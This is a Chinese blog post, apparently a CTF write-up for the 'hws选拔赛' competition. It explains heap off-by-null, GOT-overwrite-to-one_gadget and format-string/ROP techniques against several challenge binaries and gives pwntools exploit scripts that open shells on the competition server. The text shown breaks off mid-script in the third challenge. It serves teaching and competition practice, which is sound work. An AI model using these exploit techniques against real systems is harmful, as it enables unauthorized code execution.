<!DOCTYPE html>
<html lang="zh">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="Cache-Control" content="no-siteapp">
    <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=no">
    
    <meta name="referrer" content="no-referrer-when-downgrade">
    
    <meta name="renderer" content="webkit"/>
    <meta name="force-rendering" content="webkit"/>
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"/>
    <script>if (/*@cc_on!@*/false || (!!window.MSInputMethodContext && !!document.documentMode)) window.location.href="https://support.dmeng.net/upgrade-your-browser.html?referrer="+encodeURIComponent(window.location.href); </script>
    
    
        <link rel="shortcut icon" href="/img/favicon.ico">
    
     
    <link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet">
    <link href="https://cdn.bootcdn.net/ajax/libs/font-awesome/5.13.1/css/all.min.css" rel="stylesheet">
    <link href="https://fonts.googleapis.com/css?family=Roboto:100,300,400,500,700,900" rel="stylesheet">
    <link href="https://cdn.jsdelivr.net/npm/vuetify@2.2.30/dist/vuetify.min.css" rel="stylesheet">
    
<link rel="stylesheet" href="/css/main.css">

    
    







    
    
          

    
    
    
    
    <title>
        
            hws选拔赛 | Clindy&#39;s Blog
        
    </title>
    
    
<meta name="generator" content="Hexo 5.3.0"></head>
<body>
    <div id="app">
        <v-app>
            <v-content id="page">
                <v-container fluid>
                    <v-row>
                        <v-col cols="2" class="d-none d-md-block">
                            <div id="sidebar" class="float-right">
    <a href="/" rel="home">
        <v-avatar size=96>
            <img id="logo" src="/img/head.jpg">     
        </v-avatar> 
    </a>
    <v-divider></v-divider>
    <div class="mini-menu">
        <v-btn icon href="/">
            <v-icon>home</v-icon>
        </v-btn>
        <v-btn icon href="/categories/">
            <v-icon>folder</v-icon>
        </v-btn>
        <v-btn icon href="/tags/">
            <v-icon>bookmark</v-icon>
        </v-btn>
        <v-btn icon @click="SetNightMode">
            <v-icon>{{ nightMode }}</v-icon>
        </v-btn>
    </div>
    <v-list id="main-menu" class="font-weight-bold" flat>
        
            
            <v-list-item href="/classic/" link>
            <v-list-item-icon><v-icon>account_circle</v-icon></v-list-item-icon>
            <v-list-item-content>
                经典例题
            </v-list-item-content>
            </v-list-item>
        
            
            <v-list-item href="/archives/" link>
            <v-list-item-icon><v-icon>archive</v-icon></v-list-item-icon>
            <v-list-item-content>
                时间线
            </v-list-item-content>
            </v-list-item>
        
    </v-list>
    <v-divider></v-divider>
    
        <div class="post-toc">
            <a href="/2021/02/01/Game/hws/" class="toc-header">Table of Contents</a>
            <div class="toc-content">
                <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#emarm"><span class="toc-number">1.</span> <span class="toc-text">emarm</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#ememarm"><span class="toc-number">2.</span> <span class="toc-text">ememarm</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#justcode"><span class="toc-number">3.</span> <span class="toc-text">justcode</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#vtcpp"><span class="toc-number">4.</span> <span class="toc-text">vtcpp</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#undlcv"><span class="toc-number">5.</span> <span class="toc-text">undlcv</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#encryption"><span class="toc-number">6.</span> <span class="toc-text">encryption</span></a></li></ol>
            </div>
        </div>
    

    <div id="footer">
        <div class="footer-social">
            
                
                <v-btn icon href="mailto:clindy.h@qq.com" target="_blank">
                    <v-icon>fas fa-envelope</v-icon>
                </v-btn>
            
                
                <v-btn icon href="https://github.com/" target="_blank">
                    <v-icon>fab fa-github</v-icon>
                </v-btn>
            
                
                <v-btn icon href="https://baidu.com" target="_blank">
                    <v-icon>fab fa-weibo</v-icon>
                </v-btn>
            
                
                <v-btn icon href="https://baidu.com" target="_blank">
                    <v-icon>fab fa-qq</v-icon>
                </v-btn>
            
        </div>
        <v-divider></v-divider>
        <div class="footer-content">
            
                <span id="busuanzi_container_site_uv" style="display: none;"> 
                    Total Visitors <span id="busuanzi_value_site_uv"></span>
                </span>
                <br>
            
            <span>Theme: <a target="_blank" rel="noopener" href="https://github.com/kb1000fx/hexo-theme-insulin">Insulin</a></span><br>
            <span>Powered by <a target="_blank" rel="noopener" href="https://hexo.io/">Hexo</a></span><br>
            <span>
                &copy; 2020 - 2021 
                Clindy
            </span>
        </div>
    </div>
</div>

                        </v-col>
                        <v-col cols="12" md="10">
                            <v-row>
  <v-col cols="12" md="8" align-self="end">
    <div id="site-header">
      <div id="site-title">
        <a href="/" rel="home">Clindy&#39;s Blog</a>
      </div>
      <div id="site-description">像风走了八千里，不问归期</div>
      <div id="mobile-menu" class="d-block d-md-none">
        <v-text-field label="请输入关键字" data-src="search.xml" v-model="searchHeaderValue" prepend-inner-icon="search" clearable clear-icon="clear" @keydown.enter="EnterSearch(searchHeaderValue,false)"></v-text-field>
        <div class="mobile-mini-menu">
          <v-btn icon href="/">
              <v-icon>home</v-icon>
          </v-btn>
          <v-btn icon href="/categories/">
              <v-icon>folder</v-icon>
          </v-btn>
          <v-btn icon href="/tags/">
              <v-icon>bookmark</v-icon>
          </v-btn>
          <v-btn icon @click="SetNightMode">
              <v-icon>{{ nightMode }}</v-icon>
          </v-btn>
          
            
            <v-btn icon href="/classic/">
              <v-icon>account_circle</v-icon>
            </v-btn>
          
            
            <v-btn icon href="/archives/">
              <v-icon>archive</v-icon>
            </v-btn>
          
        </div>
      </div>    
    </div>
  </v-col>  
  <v-col cols="4" align-self="end" class="d-none d-md-block">
    <v-col align-self="end">
      <v-text-field label="请输入关键字" data-src="search.xml" v-model="searchHeaderValue" prepend-icon="search" clearable clear-icon="clear" @keydown.enter="EnterSearch(searchHeaderValue,false)"></v-text-field>
    </v-col> 
  </v-col>
</v-row>

                            <v-card class="elevation-2 post-card">
    
    
        <div class="post-header">
  <a class="post-header-title font-weight-medium" href="/2021/02/01/Game/hws/">hws选拔赛</a>
  <div class="post-header-meta">   
    <span>
      <v-icon color="">event</v-icon>
      Posted on:&nbsp;2021-02-01
    </span>
    <span>
      <v-icon color="">event_available</v-icon>
      Edited on:&nbsp;2021-03-12
    </span>
    <span>
      <v-icon color="">folder</v-icon>
      In:&nbsp;<a class="category-link" href="/categories/Game/">Game</a>
    </span>
    
    <span>
      <v-icon color="">visibility</v-icon>
      Views:&nbsp;<span id="busuanzi_container_page_pv"><span id="busuanzi_value_page_pv"></span></span>
    </span>
    
  </div>
</div>

    
    
    
    
    <div class="post-content typo">
        <h1 id="emarm"><a href="#emarm" class="headerlink" title="emarm"></a>emarm</h1><p>开始要输入一个passwd，让它等于一个随机数，但负责比较的函数是strncmp，输入”\x00”直接截断就通过了。</p>
<p>之后给了我们一个任意写，发现fread和一个one_gadget地址接近，所以直接改fread的got表为one_gadget,再输入输入一个参数0满足x1==NULL的条件即可。</p>
<blockquote>
<p>fread 0x628e0</p>
<p>0x63e80 execl(“/bin/sh”, x1)</p>
<p>constraints:</p>
<p>x1 == NULL</p>
</blockquote>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.log_level = <span class="string">&quot;debug&quot;</span></span><br><span class="line">context.arch = <span class="string">&quot;aarch64&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">write</span>(<span class="params">addr,value</span>):</span></span><br><span class="line">    target = <span class="built_in">str</span>(addr)</span><br><span class="line">    target = target.ljust(<span class="number">8</span>,<span class="string">&quot;\x00&quot;</span>)</span><br><span class="line">    p.send(<span class="built_in">str</span>(target))</span><br><span class="line">    p.recvuntil(<span class="string">&quot;you will success&quot;</span>)</span><br><span class="line">    p.send(value)</span><br><span class="line">    </span><br><span class="line">p = remote(<span class="string">&quot;183.129.189.60&quot;</span>,<span class="number">10012</span>)</span><br><span class="line"><span class="comment">#p  = process([&quot;qemu-aarch64&quot;,&quot;./emarm&quot;])</span></span><br><span class="line"><span class="comment">#p  = process([&quot;qemu-aarch64&quot;,&quot;-g&quot;,&quot;1234&quot;,&quot;./emarm&quot;])</span></span><br><span class="line">elf = ELF(<span class="string">&quot;./emarm&quot;</span>)</span><br><span class="line">libc = elf.libc</span><br><span class="line"></span><br><span class="line">p.recvline()</span><br><span class="line">p.recvuntil(<span class="string">&quot;passwd:\n&quot;</span>)</span><br><span class="line">p.send(p64(<span class="number">0</span>)) <span class="comment">#passwd</span></span><br><span class="line"></span><br><span class="line">write(elf.got[<span class="string">&quot;fread&quot;</span>],p16(<span class="number">0x3e80</span>))</span><br><span class="line"><span class="comment">#write(0x412080,&quot;xx&quot;)</span></span><br><span class="line">p.recvuntil(<span class="string">&quot;i leave for you bye&quot;</span>)</span><br><span class="line">p.sendline(<span class="string">&quot;0&quot;</span>)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<h1 id="ememarm"><a href="#ememarm" class="headerlink" title="ememarm"></a>ememarm</h1><p>armv8架构，got表可写，没开pie，开启了tcache且有保护。</p>
<p>main函数最初会创建一个头节点，这里称之为Head，节点结构如下：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">Node</span>&#123;</span></span><br><span class="line">    __int64 cx;</span><br><span class="line">    __int64 cy;</span><br><span class="line">    __int64 unused;</span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">Node</span>* <span class="title">next</span>;</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>进入main函数时可以向Head节点输入0x18个字节的数据</p>
<p>菜单的选项如下：</p>
<ul>
<li>malloc大小为0x20的堆块，可以分别read输入cx和cy，把chunk加入链表。</li>
<li>malloc大小为0x20的堆块，可以分别read输入cx和cy，不把chunk加入链表。</li>
<li>malloc大小为0x30的堆块，可以分别read输入cx和cy，把chunk加入链表。</li>
<li>malloc大小为0x30的堆块，可以分别read输入cx和cy，不把chunk加入链表。</li>
<li>选择第i个Node，往该处read 0x18个字节，read完后free(node-&gt;next)，并将指针置空。由于这里存在一个off-by-null,即当read字节刚好会0x18时，会自动往后补一个’0’，改变本来要free的目标。这也是破题关键。</li>
<li>free的次数不超过10次</li>
</ul>
<p>其它都是混淆视听的没用的东西。</p>
<p>这题堆块初始位置是固定的，为0x413000，Head节点的地址为0x413260。</p>
<p>先在Head节点伪造一个大小为0x31的堆块。</p>
<p>凑一凑堆块的大小，令某个堆块的起始地址处于0xe0结尾的位置，设这个堆块为第C个堆块，在这个地方伪造一个大小为0x31大小的堆块，这个fakechunk的数据区域的地址以0x00开头。</p>
<p>这时用off-by-null edit 第C+1堆块，这个fakeheap会被free掉进入tcache，再将它add回来，在cy处写入Head节点unkown成员的地址。然后再edit第C个堆块（不触发off-by-null)，第C个堆块的next值为前面输入的cy（为Head处伪造的堆块），这时Head处伪造的堆块会被free掉。下次再add大小为0x31的堆块，就会分配到Head节点处，改变Head节点的next指针，让它指向其它地方。</p>
<p>将next指针改为0x41大小的tcache的fd指针处（tcache链最开始可以构造出来），再用add to list可以改变fd的值。</p>
<p>因为这题没有leak，打IO，栈迁移都不现实，就想将got表改成one_gadget。找了找和gadget地址相近的libc函数，发现puts和setbuf的地址比较接近，如下：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">0x63e80 execl(&quot;/bin/sh&quot;, x1)</span><br><span class="line">constraints:</span><br><span class="line">  x1 == NULL</span><br><span class="line">  </span><br><span class="line"><span class="meta">#</span><span class="bash">setbuf 0x6b308</span></span><br><span class="line"><span class="meta">#</span><span class="bash">puts : 0x63f40</span></span><br></pre></td></tr></table></figure>
<p>aarch64传参规则是x0,x1,x2……，约束条件是x1==NULL，由此结合代码知puts函数不满足条件，因为add函数中，puts前面是read，第二个参数一定是一个固定的地址。而setbuf函数只在main函数开始处才会被调用，幸运的是setbuf和malloc的got表位置相邻，所以将malloc改为调用setbuf的地方，将setbuf改为one_gadget，二段跳getshell。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">context.log_level = <span class="string">&quot;debug&quot;</span></span><br><span class="line">context.arch = <span class="string">&quot;aarch64&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">start</span>(<span class="params">content</span>):</span></span><br><span class="line">    p.recvline()</span><br><span class="line">    p.send(content)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add20_to_list</span>(<span class="params">cx,cy</span>):</span></span><br><span class="line">    p.sendlineafter(<span class="string">&quot;you choice:&quot;</span>,<span class="string">&quot;1&quot;</span>)</span><br><span class="line">    p.sendafter(<span class="string">&quot;cx&quot;</span>,cx)</span><br><span class="line">    p.sendafter(<span class="string">&quot;cy&quot;</span>,cy)</span><br><span class="line">    p.sendlineafter(<span class="string">&quot;do you want delete?&quot;</span>,<span class="string">&quot;1&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add20</span>(<span class="params">cx,cy</span>):</span></span><br><span class="line">    p.sendlineafter(<span class="string">&quot;you choice:&quot;</span>,<span class="string">&quot;1&quot;</span>)</span><br><span class="line">    p.sendafter(<span class="string">&quot;cx&quot;</span>,cx)</span><br><span class="line">    p.sendafter(<span class="string">&quot;cy&quot;</span>,cy)</span><br><span class="line">    p.sendlineafter(<span class="string">&quot;do you want delete?&quot;</span>,<span class="string">&quot;2&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add30_to_list</span>(<span class="params">cx,cy</span>):</span></span><br><span class="line">    p.sendlineafter(<span class="string">&quot;you choice:&quot;</span>,<span class="string">&quot;4&quot;</span>)</span><br><span class="line">    p.sendafter(<span class="string">&quot;cx&quot;</span>,cx)</span><br><span class="line">    p.sendafter(<span class="string">&quot;cy&quot;</span>,cy)</span><br><span class="line">    p.sendlineafter(<span class="string">&quot;do you want delete?&quot;</span>,<span class="string">&quot;1&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add30</span>(<span class="params">cx,cy</span>):</span></span><br><span class="line">    p.sendlineafter(<span class="string">&quot;you choice:&quot;</span>,<span class="string">&quot;4&quot;</span>)</span><br><span class="line">    p.sendafter(<span class="string">&quot;cx:\n&quot;</span>,cx)</span><br><span class="line">    p.sendafter(<span class="string">&quot;cy:\n&quot;</span>,cy)</span><br><span class="line">    p.sendlineafter(<span class="string">&quot;do you want delete?&quot;</span>,<span class="string">&quot;2&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit</span>(<span class="params">idx,content</span>):</span></span><br><span class="line">    p.sendlineafter(<span class="string">&quot;you choice:&quot;</span>,<span class="string">&quot;3&quot;</span>)</span><br><span class="line">    p.sendline(<span class="built_in">str</span>(idx))</span><br><span class="line">    p.send(content)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit_head</span>(<span class="params">idx,content</span>):</span></span><br><span class="line">    p.sendlineafter(<span class="string">&quot;you choice:&quot;</span>,<span class="string">&quot;3&quot;</span>)</span><br><span class="line">    p.sendline(<span class="built_in">str</span>(idx))</span><br><span class="line">    p.sendafter(<span class="string">&quot;nonono&quot;</span>,content)</span><br><span class="line">    </span><br><span class="line">p = remote(<span class="string">&quot;183.129.189.60&quot;</span>,<span class="number">10034</span>)</span><br><span class="line"><span class="comment">#p = process([&quot;qemu-aarch64&quot;,&quot;-L&quot;,&quot;./&quot;,&quot;./ememarm&quot;])</span></span><br><span class="line"><span class="comment">#p = process([&quot;qemu-aarch64&quot;,&quot;-g&quot;,&quot;1234&quot;,&quot;-L&quot;,&quot;./&quot;,&quot;./ememarm&quot;])</span></span><br><span class="line">elf = ELF(<span class="string">&quot;./ememarm&quot;</span>)</span><br><span class="line">libc = ELF(<span class="string">&quot;./libc.so.6&quot;</span>)</span><br><span class="line">one=[<span class="number">0x3f150</span>,<span class="number">0x3f174</span>,<span class="number">0x3f198</span>,<span class="number">0x63e80</span>]</span><br><span class="line"></span><br><span class="line">start(<span class="string">&quot;a&quot;</span>*<span class="number">8</span>+p64(<span class="number">0x31</span>))</span><br><span class="line"></span><br><span class="line">add20_to_list(p64(<span class="number">1</span>),p64(<span class="number">0x66666666</span>))</span><br><span class="line">add30_to_list(p64(<span class="number">2</span>),p64(<span class="number">0x66666666</span>))</span><br><span class="line">add30_to_list(p64(<span class="number">3</span>),p64(<span class="number">0x66666666</span>))</span><br><span class="line">add30_to_list(p64(<span class="number">4</span>),p64(<span class="number">0x66666666</span>))</span><br><span class="line">add30_to_list(p64(<span class="number">5</span>),p64(<span class="number">0x66666666</span>))</span><br><span class="line">add20_to_list(p64(<span class="number">6</span>),p64(<span class="number">0x66666666</span>))</span><br><span class="line">add20_to_list(p64(<span class="number">7</span>),p64(<span class="number">0x31</span>)) <span class="comment">#f0</span></span><br><span class="line">add20_to_list(p64(<span class="number">8</span>),p64(<span class="number">0x66666666</span>))</span><br><span class="line">add20_to_list(p64(<span class="number">9</span>),p64(<span class="number">0x66666666</span>))</span><br><span class="line"></span><br><span class="line">add20_to_list(p64(<span class="number">10</span>),p64(<span class="number">0x66666666</span>))</span><br><span class="line">add30_to_list(p64(<span class="number">11</span>),p64(<span class="number">0x66666666</span>))</span><br><span class="line">add30_to_list(p64(<span class="number">12</span>),p64(<span class="number">0x66666666</span>))</span><br><span class="line">add30_to_list(p64(<span class="number">13</span>),p64(<span class="number">0x66666666</span>))</span><br><span class="line">add30_to_list(p64(<span class="number">14</span>),p64(<span class="number">0x66666666</span>))</span><br><span class="line">add30_to_list(p64(<span class="number">15</span>),p64(<span class="number">0x66666666</span>))</span><br><span class="line"></span><br><span class="line">edit(<span class="number">15</span>,<span class="string">&quot;t&quot;</span>*<span class="number">0x17</span>) <span class="comment">#0x41 tcache chain</span></span><br><span class="line">edit(<span class="number">14</span>,<span class="string">&quot;t&quot;</span>*<span class="number">0x17</span>)</span><br><span class="line">edit(<span class="number">13</span>,<span class="string">&quot;t&quot;</span>*<span class="number">0x17</span>)</span><br><span class="line">edit(<span class="number">12</span>,<span class="string">&quot;t&quot;</span>*<span class="number">0x17</span>)</span><br><span class="line"></span><br><span class="line">edit(<span class="number">8</span>,<span class="string">&quot;A&quot;</span>*<span class="number">0x18</span>)</span><br><span class="line">add20(<span class="string">&quot;a&quot;</span>*<span class="number">8</span>,p64(<span class="number">0x413270</span>)) <span class="comment">#malloc tcache</span></span><br><span class="line">edit(<span class="number">7</span>,<span class="string">&quot;6&quot;</span>*<span class="number">0x17</span>)   <span class="comment">#free head</span></span><br><span class="line">add20(p64(<span class="number">0</span>),p64(<span class="number">0x413530</span>))</span><br><span class="line"></span><br><span class="line">edit(<span class="number">1</span>,p64(elf.got[<span class="string">&quot;setbuf&quot;</span>]))</span><br><span class="line">add30(p64(<span class="number">0</span>),p64(<span class="number">0</span>))</span><br><span class="line">p.sendlineafter(<span class="string">&quot;you choice:&quot;</span>,<span class="string">&quot;4&quot;</span>)</span><br><span class="line">p.sendafter(<span class="string">&quot;cx:\n&quot;</span>,p16(<span class="number">0x3e80</span>))    <span class="comment">#setbuf-&gt;one</span></span><br><span class="line">p.sendafter(<span class="string">&quot;cy:\n&quot;</span>,p64(<span class="number">0x400894</span>))  <span class="comment">#malloc-&gt;call setbuf</span></span><br><span class="line">p.sendline(<span class="string">&quot;2&quot;</span>)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br><span class="line"></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">0x63e80 execl(&quot;/bin/sh&quot;, x1)</span></span><br><span class="line"><span class="string">constraints:</span></span><br><span class="line"><span class="string">  x1 == NULL</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br></pre></td></tr></table></figure>


<h1 id="justcode"><a href="#justcode" class="headerlink" title="justcode"></a>justcode</h1><p>2.23的库，got表可写，<strong>只能orw</strong>。</p>
<p>先输入四个数选择之后要进行的4次操作，</p>
<p>case1会往栈上读0x90个字节，再把字符串存到堆上打印出来，可以用它泄露栈内的信息，几乎都可以泄露。这里可以覆盖到canary，但覆盖不到ebp。</p>
<p>case2给了我们一个利用栈上残留信息，4字节写的机会，这里是用esi传参，地址也只能传4字节，还是有一点限制的。</p>
<p>思路为先利用case1泄露libc基址，再改__stack_check_fail为main函数，第四次操作选择1，覆盖canary跳回main函数继续操作。</p>
<p>然后泄露栈地址，将atoi的got表改为printf，引入格式化字符串漏洞，第四次选case1，布置rop链并覆盖canary，再次跳回main函数。</p>
<p>第三轮用格式化字符串漏洞修改返回地址，让它跳到布置好的rop链上。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.log_level = <span class="string">&quot;debug&quot;</span></span><br><span class="line">context.arch = <span class="string">&quot;amd64&quot;</span></span><br><span class="line">context.terminal = [<span class="string">&quot;open-wsl.exe&quot;</span>,<span class="string">&quot;-c&quot;</span>]</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">four_code</span>(<span class="params">a1,a2,a3,a4</span>):</span></span><br><span class="line">    p.recvuntil(<span class="string">&quot;your code:\n&quot;</span>)</span><br><span class="line">    p.sendline(<span class="built_in">str</span>(a1))</span><br><span class="line">    p.sendline(<span class="built_in">str</span>(a2))</span><br><span class="line">    p.sendline(<span class="built_in">str</span>(a3))</span><br><span class="line">    p.sendline(<span class="built_in">str</span>(a4))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">debug</span>(<span class="params">s=[]</span>):</span></span><br><span class="line">    s.append(<span class="string">&quot;b* 0x400DAD&quot;</span>)<span class="comment">#main atoi</span></span><br><span class="line">    <span class="comment">#s.append(&quot;b* 0x400D7B&quot;)#puts your code</span></span><br><span class="line">    <span class="comment">#s.append(&quot;b* 0x400CC3&quot;)#canary</span></span><br><span class="line">    <span class="comment">#s.append(&quot;b* 0x400CAE&quot;)#step1 printf</span></span><br><span class="line">    <span class="comment">#s.append(&quot;b* 0x400CE9&quot;)#step2 puts</span></span><br><span class="line">    s.append(<span class="string">&quot;set $s=0x6020D0&quot;</span>)</span><br><span class="line">    s.append(<span class="string">&quot;set $c=&quot;</span>+<span class="built_in">str</span>(libc.sym[<span class="string">&quot;setcontext&quot;</span>]))</span><br><span class="line">    gdb.attach(p,<span class="string">&quot;\n&quot;</span>.join(s))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">step1</span>(<span class="params">content</span>):</span></span><br><span class="line">    p.recvuntil(<span class="string">&quot;name:&quot;</span>)</span><br><span class="line">    p.send(content)</span><br><span class="line">    p.recvuntil(<span class="string">&quot;check it : &quot;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">step2</span>(<span class="params">value,content</span>):</span></span><br><span class="line">    p.recvuntil(<span class="string">&quot;id:\n&quot;</span>)</span><br><span class="line">    p.sendline(<span class="built_in">str</span>(value))</span><br><span class="line">    p.recvuntil(<span class="string">&quot;info:&quot;</span>)</span><br><span class="line">    p.send(content)</span><br><span class="line"></span><br><span class="line">file=<span class="string">&quot;./justcode&quot;</span></span><br><span class="line">elf=ELF(file)</span><br><span class="line">libc=elf.libc</span><br><span class="line"><span class="comment">#p = process(file)</span></span><br><span class="line">p = remote(<span class="string">&quot;183.129.189.60&quot;</span>,<span class="number">10041</span>)</span><br><span class="line">four_code(<span class="number">1</span>,<span class="number">1</span>,<span class="number">2</span>,<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">##=== first part</span></span><br><span class="line"></span><br><span class="line">main_addr = <span class="number">0x400D4B</span></span><br><span class="line">ret = <span class="number">0x400901</span></span><br><span class="line"></span><br><span class="line">step1(<span class="string">&quot;A&quot;</span>*<span class="number">0x18</span>)</span><br><span class="line">p.recvuntil(<span class="string">&quot;A&quot;</span>*<span class="number">0x18</span>)</span><br><span class="line">libc.address = u64(p.recv(<span class="number">6</span>).ljust(<span class="number">8</span>,<span class="string">&quot;\x00&quot;</span>))-<span class="number">0x6ec7a</span></span><br><span class="line"></span><br><span class="line">info(<span class="string">&quot;libc  ===&gt; 0x%x&quot;</span>,libc.address)</span><br><span class="line"></span><br><span class="line">step1(<span class="string">&quot;A&quot;</span>*<span class="number">12</span>+p64(elf.got[<span class="string">&quot;__stack_chk_fail&quot;</span>]))</span><br><span class="line">step2(main_addr,<span 